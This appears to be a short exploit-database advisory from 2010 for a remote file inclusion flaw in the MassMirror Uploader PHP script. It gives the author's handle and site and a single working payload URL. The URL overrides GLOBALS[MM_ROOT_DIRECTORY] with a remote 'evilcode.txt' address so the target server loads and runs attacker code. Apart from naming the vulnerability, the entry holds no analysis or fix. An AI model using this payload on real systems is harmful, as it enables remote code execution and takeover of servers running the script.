id: 14749
date: 11/07/2010
title: MassMirror Uploader Remote File Inclusion Vulnerability
author: ViciOuS
cves: 

=======================================================
MassMirror Uploader Remote File Inclusion Vulnerability
=======================================================

########################################################################################
 
Author : ViciOuS
 
Author Web Page :http://www.sabotaj.in
 
Email : vicious[at]sabotaj.in
 
Script Page : http://massmirror.com/uploader/
 
########################################################################################
  
RFI :
 
http://localhost/Base/example_1.php?GLOBALS[MM_ROOT_DIRECTORY]=http://evilcode.txt??
 
########################################################################################
Thanks WwW.sabotaj.iN , KocKaf52
########################################################################################



#  0day.today [2023-03-26]  #